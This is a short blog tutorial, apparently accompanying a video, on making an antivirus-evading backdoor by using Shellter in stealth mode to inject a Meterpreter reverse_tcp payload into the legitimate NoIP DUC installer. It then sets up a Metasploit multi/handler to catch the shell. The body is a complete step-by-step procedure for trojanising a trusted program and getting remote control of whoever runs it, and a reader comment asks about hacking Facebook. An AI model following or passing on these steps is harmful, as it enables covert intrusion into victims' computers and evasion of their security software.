Create FUD PAYLOAD using Kali linux 2.0 - Shellter


 -= Evilbot =-
                                           -= Creating Fud Backdoor - Shellter -=
                                                -= Kali Linux 2.0 ( Rolling ) =- 

Wine32 Must Be Installed :-
Any Exe File :-
Download Shellter From The Link In Description :-
-------
Here I Have The NoIp ( DUC ) EXE File , Copy The File And Paste It On Shellter Folder
Rename The Exe File With Anything You Want :3

Open The New Terminal And Type > cd Desktop/shellter/  > Hit Enter Button Now
Then Type > ls
Then > wine shellter.exe
Now Type A For Auto Operation
PE Target > noip.exe ( But The Name Of The Downloaded EXE File )
Now Wait 1 min
----
Now After some wait Press N For Stealth mode
Then Press L To Select Payload & Then Press 1 and hit ENTER Button
SET HOST > Your IP
SET LPORT > 8080 ( Default )
Hit Enter Button :3 Injection Verified!
Now Type Clear And Start The Service > service postgresql start
Now Type msfconsole
msf > use exploit/multi/handler
Now > set PAYLOAD windows/meterpreter/reverse_tcp
Then > Set LHOST ( IP )
Then > Set LPORT 8080
Then > exploit -j
----------------

 
Watch The Video And Enjoy :)
Must Like The Video And Subscribe and Share :)



About Author:

Evilbot is a young Information System Security Geek also giving classes of Pentesting.


Let's Get Connected: Twitter | Facebook | Google Plus

Share this

Related Posts

Previous
Next Post »

2 comments

Write comments
16 March 2017 at 11:49 delete

wheres the link of download?

Reply
avatar
16 March 2017 at 11:53 delete

in the facebook hack not worked?

Reply
avatar